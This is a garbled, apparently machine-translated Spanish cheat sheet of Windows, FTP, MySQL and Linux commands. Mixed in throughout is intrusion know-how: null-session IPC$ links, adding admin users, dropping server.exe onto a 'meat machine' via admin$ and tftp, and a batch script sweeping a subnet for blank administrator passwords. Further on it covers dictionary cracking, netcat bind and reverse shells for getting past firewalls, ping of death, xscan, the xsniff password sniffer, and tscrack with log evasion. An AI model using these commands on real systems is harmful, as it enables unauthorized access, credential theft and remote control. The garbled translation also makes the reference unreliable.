Red de conocimiento informático - Problemas con los teléfonos móviles - línea de comando de enlace de red de control de win2000 y 2003

línea de comando de enlace de red de control de win2000 y 2003

net use ipipc$ " " /user:" " Establecer un enlace IPC vacío

net use ipipc$ "Contraseña" /user:"nombre de usuario" Crear un enlace IPC no vacío

p>

net use h: ipc$ "contraseña" /usuario: "nombre de usuario" Después de iniciar sesión directamente, asigne la otra parte C: al H local:

net use h: ipc$ Después de iniciar sesión, asigne la otra parte C: al H local:

net use ipipc$ /del Eliminar el enlace IPC

net use h: / del Eliminar la asignación de la otra parte al H:

nombre de usuario y contraseña del usuario de red local/agregar para crear un usuario

usuario de red invitado /activo:yes para activar el usuario invitado

usuario de red para ver qué usuarios hay

nombre de cuenta de usuario de red para ver los atributos de la cuenta

administradores de grupo local de red nombre de usuario/add Agregar "usuario" al administrador para otorgarle derechos de administrador. Nota: agregue s después de administrador para hacerlo plural

net start Compruebe qué servicios están habilitados

el nombre del servicio net start inicia el servicio (como; como: net start telnet, net start Schedule)

nombre del servicio net stop detiene un servicio

hora neta IP objetivo Verifique la hora de la otra parte

hora neta objetivo IP /set Configure la hora de la computadora local para sincronizarla con la hora del host "IP de destino". Agregue el parámetro /yes para cancelar el mensaje de confirmación.

net view Vea qué recursos compartidos de VPN están habilitados en la LAN local.

net view ip Ver qué recursos compartidos de VPN están habilitados en la LAN de la otra parte

net config display Configuración de red del sistema

privilegios de desconexión de cierre de sesión de red

net pausa nombre del servicio para pausar un servicio

net enviar ip "mensaje de texto" a la otra parte Enviar un mensaje

net ver Tipo de conexión de red e información que se utiliza en la LAN

net share Ver recursos compartidos *** habilitados localmente

net share ipc$ habilitar ipc$***share

net share ipc$ /del eliminar ipc$ ***share

net share c$ /del eliminar C:***share

net user guest 12345 Después de iniciar sesión como usuario invitado, cambie la contraseña a 12345

contraseña de red para cambiar la contraseña de inicio de sesión del sistema

netstat -a para verificar qué puertos están abiertos, netstat -an de uso común

netstat -n Verifique la conexión de red estado del puerto, de uso común netstat -an

netstat -v verificar el trabajo en curso

netstat -p nombre del protocolo Ejemplo: netstat -p tcq/ip Verificar el uso de un determinado protocolo (verifique el uso del protocolo tcp/ip)

netstat -s Verifique el uso de todos los protocolos en uso

nbtstat -A Si uno de los puertos 136 al 139 del otro parte está abierta, puede verificar el nombre de usuario del inicio de sesión reciente de la otra parte (el anterior a 03 es el nombre de usuario) - Nota: el parámetro -A debe estar en mayúscula

tracert - parámetro ip (o computadora nombre) traceroute (paquete), parámetros: "

-w número" se utiliza para establecer el intervalo de tiempo de espera.

Ping ip (o nombre de dominio) envía datos con un tamaño predeterminado de 32 bytes al otro host. Parámetro: "-l [espacio] tamaño del paquete "; " -n "Número de veces para enviar datos"; "-t" significa hacer ping todo el tiempo

ping -t -l 65550 ip ping of death (enviar archivos de más de 64K y hacer ping a todos). el tiempo se convierte en el ping de la muerte)

ipconfig (winipcfg) se utiliza para Windows NT y proceso de visualización (una herramienta adicional para el sistema, no instalada de forma predeterminada, en la carpeta Soporte/herramientas del directorio de instalación )

kill -F Agregue el parámetro -F al nombre del proceso para forzar el final de un proceso (para el sistema Las herramientas adicionales no se instalan de forma predeterminada y se encuentran en la carpeta Soporte/herramientas del directorio de instalación )

del -F Los archivos de solo lectura se pueden eliminar agregando el parámetro -F al nombre del archivo, /AR, /AH , /AS, /AA significa eliminar archivos ocultos de solo lectura del sistema. y archivos de almacenamiento respectivamente, /A-R, /A-H, /A-S, /A-A significa eliminar archivos que no sean archivos de solo lectura, ocultos, del sistema y de archivo. Por ejemplo, "DEL/AR". todos los archivos de solo lectura en el directorio actual, "DEL/A-S *.*" significa eliminar todos los archivos en el directorio actual excepto los archivos del sistema

Dos:

del /S / Directorio Q o use: rmdir /s /Q directorio /S para eliminar el directorio y todos los subdirectorios y archivos bajo el directorio. Al mismo tiempo, use el parámetro /Q para cancelar la confirmación del sistema durante la operación de eliminación y eliminarlo directamente.

(Los dos comandos tienen el mismo efecto)

move La ruta de la letra de la unidad es el nombre del archivo que se va a mover. La ruta para almacenar el archivo movido es el nombre del archivo después del movimiento. cancele el mensaje para confirmar que existe el mismo archivo en el directorio movido. Sobrescritura directa

fc one.txt two.txt > 3st.txt Compare los dos archivos y envíe las diferencias al archivo 3st.txt. "> " y "> >" son comandos de redirección

En el número de identificación se inicia una tarea programada registrada

en /delete detiene todas las tareas programadas. Utilice el parámetro /yes para detener directamente sin confirmación.

en el número de identificación/eliminar Detener una tarea programada registrada

en Ver todas las tareas programadas

en la hora ip Nombre del programa (o un comando) /r Ejecute el otra parte en un momento determinado Un determinado programa y reinicie la computadora

dedo nombre de usuario @host para ver qué usuarios han iniciado sesión recientemente

telnet puerto ip remoto y servidor de inicio de sesión, el puerto predeterminado es 23

open ip Conectarse a IP (comando después de iniciar sesión en telnet)

telnet Escriba telnet directamente en la máquina local para ingresar el telnet de la máquina local

copiar ruta nombre de archivo 1 ruta nombre de archivo 2 / y Copie el archivo 1 al directorio especificado como archivo 2. Utilice el parámetro /y para cancelar la confirmación de que desea sobrescribir un archivo de directorio existente

copiar c:srv .exe ipadmin$ Copiar local c:srv.exe Ir al administrador de la otra parte

cppy 1st.jpg/b+2st.txt/a 3st.jpg Ocultar el contenido de 2st.txt en 1st.jpg para generar un nuevo archivo 3st.jpg Nota: 2. El encabezado del archivo .txt debe tener tres filas vacías. Parámetros: /b se refiere al archivo binario, /a se refiere al archivo en formato ASCLL

copiar ipadmin. $svv.exe c: o:copyipadmin$*.* Copia el administrador de la otra parte$* ** Comparte el archivo srv.exe (todos los archivos) en el C:

xcopy local El archivo o árbol de directorios para Se copiará la dirección de destino y el nombre del directorio. Copie el archivo y el árbol de directorio. Utilice el parámetro /Y para sobrescribir sin preguntar. Mismo archivo

tftp -i IP propia (use la IP de la máquina de carne). máquina de carne como trampolín) obtenga server.exe c:server.exe Después de iniciar sesión, descargue el server.exe de "IP" al host de destino c:server.exe Parámetros: -i se refiere a la transmisión en modo binario, como al transmitir archivos exe Si no se agrega -i, la transmisión se realiza en modo ASCII (modo de transmisión de archivos de texto)

tftp -i La IP de la otra parte pone c:server.exe Después de iniciar sesión, cargue el local. c:server.exe al host

El puerto ftp ip se utiliza para cargar archivos al servidor o realizar operaciones con archivos. El puerto predeterminado es 21. bin se refiere a la transmisión en modo binario (entrada de archivo ejecutable); el valor predeterminado es la transmisión en formato ASCII (archivo de texto)

la impresión de ruta muestra la ruta IP, que mostrará principalmente la dirección de red, la dirección de red y la máscara de subred. Máscara de red, dirección de puerta de enlace Dirección de puerta de enlace, dirección de interfaz Interfaz

arp Ver y procesar el caché ARP ARP significa resolución de nombres y es responsable de analizar una IP en una dirección MAC física.

arp -a mostrará toda la información

nombre o comando del programa de inicio /max o /min para abrir una nueva ventana y maximizar (minimizar) ejecutar un programa o comando

mem Ver el uso de la CPU

nombre de archivo de atributo (nombre de directorio) Ver los atributos de un archivo (directorio)

nombre de archivo de atributo-A -R -S -H o +A +R + S +H elimina (agrega) los atributos de archivo, de solo lectura, de sistema y ocultos de un determinado archivo; use + para agregarlo como un determinado atributo

dir Ver archivos, parámetros: /Q muestra en qué sistema están los archivos; y los directorios pertenecen al Usuario, /T:C muestra la hora de creación del archivo, /T:A muestra la última vez que se accedió al archivo, /T:W hora de la última modificación

fecha /t, hora /t use este parámetro "FECHA/T", "HORA/T" solo mostrará la fecha y hora actuales sin tener que ingresar una nueva fecha y hora

establecer Especifique el nombre de la variable de entorno = el carácter que se va a utilizar. asignado a la variable Establecer la variable de entorno

p>

set muestra todas las variables de entorno actuales

set p (u otros caracteres) muestra todas las variables de entorno actuales que comienzan con el carácter p (u otros caracteres )

pause Pausa el programa por lotes y muestra: Presione cualquier tecla para continuar....

si realiza procesamiento condicional en el programa por lotes (consulte if comando y variables para obtener más instrucciones )

La etiqueta Goto dirige cmd.exe a la línea etiquetada en el programa por lotes (la etiqueta debe ser una línea separada y precedida por dos puntos, por ejemplo: etiqueta ":start")

El nombre del archivo por lotes de la ruta de llamada comienza desde Llamar a otro programa por lotes en un programa por lotes (para obtener más instrucciones, consulte llamada /?)

para ejecuta un comando específico en cada archivo en un conjunto de archivos ( para obtener más instrucciones, consulte el comando y las variables )

echo on o off activa o desactiva el eco. El uso de echo solo sin parámetros mostrará la configuración actual del eco

se mostrará la información del eco. se muestra en la pantalla

información de eco >> pass.txt Guarde la "información" en el archivo pass.txt

findstr "Hello" aa.txt Busque la cadena hola en aa. txt

buscar Buscar un archivo por nombre de archivo

título nombre del título cambia el nombre del título de la ventana CMD

color valor del color establece el color de primer plano y de fondo del consola cmd; 0=negro, 1=azul, 2=verde, 3=verde claro, 4=rojo, 5=morado, 6=amarillo, 7=blanco, 8=gris, 9=azul claro, A=verde claro, B=verde claro claro, C=rojo claro, D=púrpura claro, E=amarillo claro, F=blanco brillante

nombre del mensaje cambie el símbolo del sistema mostrado por cmd.exe (cambie C: y D: a: EntSky)

Tres:

ver muestra información de la versión en la ventana de DOS

winver abre una ventana para mostrar información de la versión (tamaño de la memoria, versión del sistema , versión del parche, nombre de la computadora)

formatear letra de unidad/FS: tipo formatear disco, tipo: FAT, FAT32, NTFS, ejemplo: Formato D: /FS:NTFS

directorio md nombre para crear directorio

reemplazar origen Archivo directorio para reemplazar archivo Reemplazar archivo

ren Nombre de archivo original Nuevo nombre de archivo Cambiar nombre de archivo

árbol Mostrar el directorio en un estructura de árbol, use el parámetro -f para enumerar el primer nombre de archivo en la carpeta

escriba el nombre del archivo muestra el contenido del archivo de texto

más nombre de archivo muestra la pantalla del archivo de salida por pantalla

comando doskey a bloquear = carácter

doskey Para desbloquear el comando = el comando de bloqueo proporcionado para DOS (edite la línea de comando y vuelva a llamar el comando win2k

comando y crear una macro). Por ejemplo: comando lock dir: doskey dir=entsky (no se puede usar doskey dir=dir desbloquear: doskey dir=

taskmgr abre el administrador de tareas

chkdsk /F D: comprobar el disco D y muestre el informe de estado; agregue el parámetro /f y corrija el error en el disco

tlntadmn telnt service admn, escriba tlntadmn y seleccione 3, luego seleccione 8, puede cambiar el puerto predeterminado del servicio telnet; 23 a cualquier otro puerto

salir sale del programa cmd.exe o del actual. El uso del parámetro /B saldrá del script por lotes actual en lugar de cmd.exe

ruta del archivo. El nombre de la ruta del archivo ejecutable es el archivo ejecutable. Establezca una ruta.

cmd inicia una ventana de interpretación de comandos de win2K. Parámetros: /eff, /en desactivar y activar la expansión del comando; para obtener instrucciones más detalladas, consulte cmd /?

regedit /s El nombre del archivo de registro se importa al registro al que se refiere; importación en modo silencioso, sin ningún mensaje

regedit /e Nombre del archivo de registro exporta el registro

El parámetro de nombre de archivo cacls muestra o modifica la lista de control de acceso a archivos (ACL) - para NTFS; formato. Parámetros: /D nombre de usuario: configurado para denegar el acceso a un determinado usuario; /P nombre de usuario: permanente reemplaza los derechos de acceso del usuario especificado; /G nombre de usuario: permanente otorga derechos de acceso al usuario especificado. Puede ser: N ninguno, R; leer, W escribe, C cambia (escribe), F controla completamente; ejemplo: cacls D: est.txt /D pub establece d: est.txt para denegar el acceso al usuario pub.

nombre de archivo cacls para ver la lista de permisos de usuario de acceso a archivos

Contenido de texto REM para agregar comentarios en el archivo por lotes

netsh para ver o cambiar la red local configuración

Cuatro:

Comando de servicio IIS:

iisreset /reboot Reinicia la computadora win2k (pero aparece un mensaje solicitando que el sistema se reinicie)

iisreset /start o stop inicia (detiene) todos los servicios de Internet

iisreset /restart detiene y reinicia todos los servicios de Internet

iisreset /status muestra el estado de todos los servicios de Internet

p>

iisreset /enable or enable Habilitar (deshabilitar) el reinicio del servicio de Internet en el sistema local

iisreset /rebootonerror Al iniciar, detener o reiniciar el servicio de Internet, si ocurre un error

iisreset /noforce Si no se puede detener el servicio de Internet, el servicio de Internet no se cancelará por la fuerza

iisreset /timeout Val no ha detenido el servicio de Internet cuando se alcanza el tiempo excedido (segundos) Si se especifica el parámetro /rebootonerror, la computadora se reiniciará. El valor predeterminado es 20 segundos para reiniciar, 60 segundos para detener y 0 segundos para reiniciar.

Comando FTP: (los detalles se explican más adelante)

El formato de línea de comando de ftp es:

ftp -v -d -i -n -g[ nombre de host] -v muestra toda la información de respuesta del servidor remoto.

-d usa el modo de depuración.

-n restringe el inicio de sesión automático de ftp, es decir, no utiliza el archivo .netrc.

-g Cancela el nombre del archivo global.

ayuda [comando] o ? [Comando] Ver la descripción del comando

adiós o salir finaliza el proceso FTP del host y sale del modo de administración FTP

pwd enumera el directorio del host remoto actual

. poner o enviar el nombre del archivo local [nombre del archivo cargado en el host] para transferir un archivo local al host remoto

obtener o recibir [nombre del archivo del host remoto] [nombre del archivo descargado al local] desde Transferir un lote de archivos del host remoto al host local

mget [remote-files] Recibir un lote de archivos del host remoto al host local

mput local-files Transferir un lote de archivos al host local Transferir archivos al host remoto

dir o ls [directorio-remoto] [archivo-local] enumera los archivos en el directorio del host remoto actual. Si hay archivos locales, escriba. los resultados al archivo local

ascii Configurar para enviar archivos en modo ASCII (valor predeterminado)

bin o image Configurar para enviar archivos en modo binario

bell Cada vez que se completa una transferencia de archivos, el mensaje de alarma

cdup regresa al directorio anterior

cerrar interrumpe la sesión ftp con el servidor remoto (correspondiente a abrir)

abrir host[puerto] establece la conexión del servidor ftp especificado, puede especificar el puerto de conexión

delete elimina archivos en el host remoto

mdelete [remote-files] elimina un lote de files

mkdir nombre-directorio Crea un directorio en el host remoto

rename [from] [to] Cambia el nombre del archivo en el host remoto

directorio rmdir -name Eliminar el directorio en el host remoto

el estado muestra el estado actual de FTP

el sistema muestra el tipo de sistema del host remoto

usuario nombre de usuario [contraseña] [cuenta] Vuelva a iniciar sesión en el host remoto con otro nombre de usuario host

abrir host [puerto] restablecer una nueva conexión

modo de aviso interactivo

macdef define macro comando

lcd change El directorio de trabajo actual del host local Si es predeterminado, vaya al directorio HOME del usuario actual

chmod cambia los permisos de archivo del host remoto<. /p>

case Cuando esté activado, use el comando MGET Copie los nombres de los archivos a la máquina local y conviértalos todos a letras minúsculas

cd remote-dir ingresa al directorio del host remoto

cdup ingresa al directorio principal del directorio del host remoto

! Ejecute un shell interactivo en la máquina local, salga y regrese al entorno ftp, como!ls*.zip

#5 Cinco:

Comando MYSQL:

mysql -h dirección de host -u nombre de usuario -p contraseña para conectarse a MYSQL si acaba de instalar MYSQL, el superusuario; root no tiene contraseña.

(Ejemplo: mysql -h110.110.110.110 -Uroot -P123456

Nota: u y root no necesitan agregar espacios, lo mismo aplica para los demás)

salir Salir de MYSQL

mysqladmin -u nombre de usuario -p contraseña anterior contraseña nueva contraseña cambiar contraseña

conceder selección en la base de datos.* al nombre de usuario@inicio de sesión host identificado por "contraseña"; agregar nuevo usuario.

(Nota: a diferencia de lo anterior, los siguientes son comandos en el entorno MYSQL, por lo que van seguidos de un punto y coma como terminador del comando)

mostrar bases de datos; Al principio solo existían dos bases de datos: mysql y test. La biblioteca mysql es muy importante. Contiene información del sistema MYSQL. Cuando cambiamos contraseñas y agregamos nuevos usuarios, en realidad usamos esta biblioteca para las operaciones.

usar mysql;

mostrar tablas; mostrar las tablas de datos en la biblioteca

describir el nombre de la tabla; p>crear el nombre de la base de datos; crear la base de datos

usar el nombre de la base de datos;

crear el nombre de la tabla de la tabla (lista de configuración de campo

eliminar el nombre de la base de datos); ;

eliminar el nombre de la tabla; eliminar la base de datos y la tabla

eliminar del nombre de la tabla; borrar los registros en la tabla

seleccionar * del nombre de la tabla; registros en la tabla Record

mysqldump --opt school>school.bbb Copia de seguridad de la base de datos: (El comando se ejecuta en el directorio mysqlin de DOS Nota: Realice una copia de seguridad de la base de datos school en el archivo school.bbb); , school.bbb es un archivo de texto, elija cualquier nombre de archivo, ábralo y vea qué nuevos descubrimientos hará.

Nuevos comandos bajo el sistema win2003 (parte práctica):

apagar /parámetro Apagar o reiniciar el host local o remoto.

Descripción del parámetro: /S apaga el host, /R reinicia el host, /T establece digitalmente el tiempo de retardo, que oscila entre 0 y 180 segundos, /A cancela el arranque, /M //IP especificada remota anfitrión.

Ejemplo: apagado /r /t 0 Reinicia el host local inmediatamente (sin demora)

taskill /parámetro nombre del proceso o pid del proceso Termina una o más tareas y procesos.

Descripción del parámetro: /PID es el pid del proceso a terminar. Puede usar el comando tasklist para obtener el pid de cada proceso, /IM es el nombre del proceso a terminar, /. F es terminar el proceso por la fuerza, /T es terminar el proceso especificado y el proceso hijo que inició.

La lista de tareas muestra los identificadores de proceso (PID) de procesos, servicios y procesos de servicio que se ejecutan actualmente en hosts locales y remotos.

Descripción del parámetro: /M enumera los archivos dll cargados por el proceso actual, /SVC muestra los servicios correspondientes a cada proceso, si no hay ningún parámetro, solo se enumera el proceso actual.

Seis:

Comandos básicos en el sistema Linux: distingue entre mayúsculas y minúsculas

uname muestra información de la versión (igual que la versión win2K)

muestra el directorio archivos en el directorio actual, ls -al muestra archivos ocultos (igual que dir en win2K)

pwd consulta la ubicación del directorio actual

cd cd ..regresa al directorio anterior, nota que hay un espacio entre cd y… cd /regresar al directorio raíz.

nombre del archivo cat Ver contenido del archivo

cat >abc.txt Escriba el contenido en el archivo abc.txt.

más nombre de archivo Muestra un archivo de texto página por página.

cp copia archivos

mv mueve archivos

rm nombre de archivo elimina archivos, rm -a nombre de directorio elimina directorios y subdirectorios

mkdir nombre del directorio crea un directorio

rmdir elimina un subdirectorio y no hay documentos en el directorio.

chmod establece los permisos de acceso de archivos o directorios

grep busca cadenas en archivos

comparación de archivos diff

buscar búsqueda de archivos

fecha Fecha y hora actual

quién Consulta las personas que actualmente utilizan la misma máquina que usted y la hora y ubicación de inicio de sesión

w Consulta la información detallada de los usuarios actuales

whoami Ver el nombre de tu cuenta

grupos Ver el grupo de alguien

contraseña Cambiar contraseña

historial Ver tus propios comandos pasados

ps muestra el estado del proceso

kill detiene un proceso

gcc Los piratas informáticos suelen usarlo para compilar archivos escritos en lenguaje C

Sus permisos se convierten a usuarios designados

telnet IP telnet se conecta al otro host (igual que win2K). Cuando aparece bash$, la conexión es exitosa.

ftp ftp se conecta a un servidor (igual que win2K)

Adjunto: comandos por lotes y variables

1: Formato básico de comandos y variables:

FOR /parameter%variable IN (set) DO comando [command_parameters] %variable: especifique un parámetro reemplazable de una sola letra, como: %i, y especifique una variable con: %%i, y al llamar a Uso de variables: %i%, las variables distinguen entre mayúsculas y minúsculas (%i no es igual a %I).

El procesamiento por lotes puede procesar de %0 a %9***10 variables cada vez, de las cuales %0 tiene como valor predeterminado el nombre del archivo por lotes y %1 tiene como valor predeterminado el que se ingresa al usar este lote. primer valor, de manera similar: %2-%9 se refiere a los valores ingresados ​​del segundo al noveno, por ejemplo: net use ipipc$ pass /user:user donde ip es %1, pass es %2 y el usuario es %3<; /p>

(set): Especifique uno o un grupo de archivos, puede usar comodines, como: (D:user.txt) y (1 1 254) (1 -1 254), { “(1 1 254) "El primer "1" se refiere al valor inicial, el segundo "1" se refiere a la cantidad de crecimiento, y el tercer "254" se refiere al valor final, es decir: de 1 a 254; "(1 - 1 254)" descripción: es decir, de 254 a 1}

comando: especifique el comando que se ejecutará en el archivo, como por ejemplo: comando net use; si desea ejecutar varios comandos, agregue: & para separar los comandos

command_parameters: especifique parámetros o interruptores de línea de comando para comandos específicos

IN (set): se refiere a tomar el valor en (set DO command): se refiere a ejecutar; comando

Parámetros: /L significa usar forma incremental {cuando (set) está en forma incremental} /F significa recuperar valores continuamente del archivo hasta que esté terminado {cuando (set) esté; un archivo, como (d:pass.txt)} .

Ejemplo de uso:

@echo off

formato de uso de eco: test.bat *.*.* > test.txt

para /L %%G en (1 1 254) haga eco %1.%%G >>test.txt y use net \%1.%%G /user:administrator busque "Comando completado exitosamente" >>prueba. txt

Guardar como test.bat Descripción: Intente establecer una conexión IPC$ con una contraseña de administrador vacía para las 254 IP en un segmento de red de clase C específico. Si tiene éxito, guarde la IP en test.txt. .

/L se refiere a la forma incremental (es decir, de 1-254 o 254-1); los primeros tres dígitos de la IP de entrada: *.*.* es el %1 predeterminado para el procesamiento por lotes; %G es variable (el último dígito de ip); & se usa para separar los dos comandos echo y net use | significa que después de crear ipc$, use buscar en los resultados para ver si hay un mensaje de "comando completado con éxito"; ; %1.% %G es la dirección IP completa (1 1 254) se refiere al valor inicial, la cantidad de crecimiento y el valor final.

@echo desactivado

formato de uso de eco: ok.bat ip

FOR /F %%i IN (D:user.dic) DO smb.exe %1 %%i D:pass.dic 200

Guardar como: ok.exe Descripción: Después de ingresar una IP, use el archivo de diccionario d:pass.dic para descifrar al usuario en d:user.dic Contraseña hasta que se agote el valor del archivo. %%i es el nombre de usuario; %1 es la dirección IP ingresada (predeterminada).

Siete:

2: Formato básico del comando if y las variables:

IF [not] declaración de comando numérico de nivel de error Si el programa se ejecuta y finalmente devuelve un valor igual o mayor que la codificación de salida numérica especificada, especificando que la condición es "verdadera".

Ejemplo: el comando IF errorlevel 0 significa que cuando el valor devuelto después de la ejecución del programa es 0, se ejecutará el comando después de la línea; IF not errorlevel 1 significa que el valor devuelto después de la ejecución del programa no es igual. a 1, entonces se ejecutará el siguiente comando.

0 significa que fue descubierto y ejecutado exitosamente (verdadero); 1 significa que no fue descubierto ni ejecutado (falso).

IF [not] Cadena 1==Cadena 2 Declaración de comando Si la cadena de texto especificada coincide (es decir: la Cadena 1 es igual a la Cadena 2), se ejecutará el siguiente comando.

Ejemplo: "if "%2%"=="4" ir a inicio" significa: si la segunda variable ingresada es 4, ejecute el siguiente comando (nota: cuando llame a una variable, use % nombre de variable % y agregue " ")

SI [no] existe declaración de comando de nombre de archivo Si el nombre de archivo especificado existe, se ejecutará el siguiente comando.

Ejemplo: "si no nc.exe ir al final" significa: si no se encuentra el archivo nc.exe, salte a la etiqueta ":end".

IF [no] declaración de comando numérico de nivel de error else declaración de comando o IF [no] cadena 1==cadena 2 declaración de comando else declaración de comando o IF [no] existe nombre de archivo declaración de comando else declaración de comando más Arriba: Después de la declaración del comando else, se refiere a: cuando la condición anterior no es verdadera, se refiere al comando después de else. Nota: else debe estar en la misma línea que para ser válido.

Cuando hay un comando del, todo el contenido del comando del debe estar encerrado en < >, porque el comando del solo se puede ejecutar en una línea separada. Después de usar < >, es equivalente a una línea separada, por ejemplo: "si existe test.txt. else echo test.txt.missing", preste atención al "." en el comando

(2) Comandos externos del sistema (ambos requieren descarga). herramientas relevantes):

1, navaja suiza: nc.exe

Descripción del parámetro:

-h Ver información de ayuda

- d Modo en segundo plano

-e prog Redirección del programa, ejecutado tan pronto como se establece la conexión [peligroso]

-i intervalo de retardo de segundos

-l modo de escucha , utilizado para conexiones entrantes

-L modo de monitoreo, continúa monitoreando después de cerrar la conexión, hasta CTR+C

-n dirección IP, el nombre de dominio no se puede usar

-o la película graba la transmisión hexadecimal

p>

-p[espacio]Número de puerto local

-r Puerto local y remoto aleatorio

-t Use el modo de interacción Telnet

-u modo UDP

-v salida detallada, use -vv para ser más detallado

-w retardo de tiempo de espera digital intervalo

-z apaga la entrada y salida (cuando se usa para barrer anclas)

Uso básico:

nc -nvv 192.168.0.1 80 Conectar al puerto 80 del host 192.168.0.1

nc -l - p 80 Abre el puerto TCP local 80 y escucha

nc -nvv -w2 -z 192.168.0.1 80-1024 Barre el 80 -1024 puertos de 192.168.0.1

nc - l -p 5354 -t -e c:winntsystem32cmd.exe Vincula el cmdshell del host remoto al puerto TCP 5354 remoto

nc - t -e c:winntsystem32cmd.exe 192.168.0.2 5354 Vincula el cmdshell del host remoto y conecta de forma inversa al puerto 5354 de 192.168.0.2

Uso avanzado:

nc -L -p 80 Use 1 como honeypot: abra y monitoree el puerto 80 hasta CTR +C hasta nc -L -p 80 > c:log.txt Use 2 como honeypot: abra y monitoree continuamente el puerto 80 hasta CTR+C, y genere los resultados to c:log .txt

nc -L -p 80 < c:honeyport.txt Usa 3-1 como honeypot: abre y escucha el puerto 80 hasta CTR+C, y pon c:honeyport. txt El contenido se envía a la canalización, que también se puede utilizar para transferir archivos

type.exe c:honeyport | nc -L -p 80 Usar como honeypot 3-2: Abrir y monitorear continuamente el puerto 80, hasta CTR+C, y envía el contenido en c:honeyport.txt al pipe, que también se puede usar para transferir archivos

Usar en esta máquina: nc -l -p puerto local

Usar en el host de la otra parte: nc -e cmd.exe IP local -p puerto local *win2K

nc -e /bin/sh IP local -p puerto local *linux, unix la conexión inversa atraviesa el firewall del otro host

Usar en la máquina local: nc -d -l -p puerto local

en el otro host Uso: nc -vv IP local puerto local > ruta y nombre del archivo almacenado

Archivo al host de la otra parte

Observaciones:

| comando de canalización

< o > comando de redirección. "<", por ejemplo: tlntadmn < test.txt significa asignar el contenido de test.txt al comando tlntadmn

@ significa ejecutar el comando después de @, pero no se mostrará (ejecución en segundo plano); por ejemplo: @ dir c:winnt >> d:log.txt significa: ejecutar dir en segundo plano y almacenar el resultado en d:log.txt

>La diferencia entre >>">" significa: sobrescribir;"> >" significa: guardar en (agregar a).

Por ejemplo: @dir c:winnt >> d:log.txt y @dir c:winnt > d:log.txt Ejecute la segunda comparación respectivamente: use >> para comparar los resultados de la. La segunda vez se guardan todos, pero cuando se usa: >, solo existe el resultado de la primera vez, porque el segundo resultado sobrescribe el primero.

Ocho:

2. Herramienta de escaneo de anclaje: xscan.exe

Formato básico

xscan -host [ - ] [Otras opciones] Escanee toda la información del host en el segmento "IP inicial a IP final"

xscan -file [Otras opciones ] Escanee toda la información del host en el ancla "nombre de archivo de la lista de IP del host"

Elementos de detección

-active Verifique si el host está activo

-os Detectar control remoto Tipo de sistema operativo (a través de protocolos NETBIOS y SNMP)

-port Detecta el estado del puerto de los servicios más utilizados

-ftp Detecta contraseñas débiles de FTP

-pub Detecta Servicios FTP Permiso de escritura de usuario anónimo

-pop3 detecta contraseñas débiles del servidor POP3

-smtp detecta vulnerabilidades del servidor SMTP

-sql detecta contraseñas débiles del servidor SQL

p>

-smb detecta contraseñas débiles de NT-Server

-iis detecta vulnerabilidades de codificación/decodificación de IIS

-cgi detecta vulnerabilidades CGI

-nasl carga el script de ataque de Nessus

-todo detecta todos los elementos anteriores

Otras opciones

-i el número de adaptador configura el adaptador de red, < número de adaptador> se puede pasar "-l" Adquisición de parámetros

-l muestra todos los adaptadores de red

-v muestra el progreso del análisis detallado

-p omite los hosts que no responden

-o Omitir hosts sin puertos abiertos detectados

-t Número de subprocesos simultáneos, el número de hosts simultáneos especifica el número máximo de subprocesos simultáneos y el número de hosts simultáneos, el el número predeterminado es 100,10

-nombre del archivo de registro especifica el nombre del archivo del informe de escaneo (sufijo: archivo en formato TXT o HTML)

Ejemplo de uso

xscan - host 192.168.1.1-192.168.255.255 -all -active -p detecta todas las vulnerabilidades de los hosts en el segmento de red 192.168.1.1-192.168.255.255 y omite los hosts que no responden

xscan -host 192.168.1.1-192.168. 255.255 -port -smb -t 150 -o Detecta el estado del puerto estándar de los hosts en el segmento de red 192.168.1.1-192.168.255.255 Para usuarios de contraseñas débiles de NT, el número máximo de subprocesos simultáneos es 150 y omite los hosts sin apertura. puertos detectados

xscan -file hostlist.txt -port -cgi -t 200,5 -v -o detecta el estado del puerto estándar y las vulnerabilidades CGI de todos los hosts enumerados en el archivo "hostlist.txt". El número máximo de subprocesos simultáneos es 200 y se puede detectar un máximo de 5 hosts al mismo tiempo. Muestra el progreso de detección detallado y omite hosts sin puertos abiertos.

Nueve:

. 3. Rastreador de línea de comando: xsniff.exe

Sí Capture la contraseña del protocolo FTP/SMTP/POP3/HTTP en la LAN

Descripción del parámetro

-salida tcp Datagrama TCP

-salida udp datagrama UDP

-salida icmp datagramas ICMP

-pasar información de contraseña de filtros

-ocultar ejecuciones en el fondo

-host resuelve nombres de host

-addr dirección IP que filtra la dirección IP

-puerto puerto de filtrado

-archivo de registro

Guarde la salida en un archivo

-asc Salida en formato ASCII

-hex Salida en formato hexadecimal

Ejemplo de uso

xsniff. exe -pass -hide -log pass.log se ejecuta en segundo plano para rastrear contraseñas y guardar la información de la contraseña en el archivo pass.log

xsniff.exe -tcp -udp -asc -addr 192.168.1.1 sniffing 192.168 .1.1 y filtrar la información tcp y udp y enviarla en formato ASCII

4. Descifrar contraseñas del servicio de terminal: tscrack.exe

Descripción del parámetro

-h. display Usar ayuda

-v Mostrar información de la versión

-s Imprimir capacidades de descifrado en la pantalla

-b Sonido cuando la contraseña es incorrecta

-t Emitir múltiples conexiones al mismo tiempo (multiproceso)

-N Evitar entradas de registro del sistema en el servidor de destino

-U Desinstalar y eliminar el componente tscrack

-f Utilice la contraseña después de -f

intervalo -F (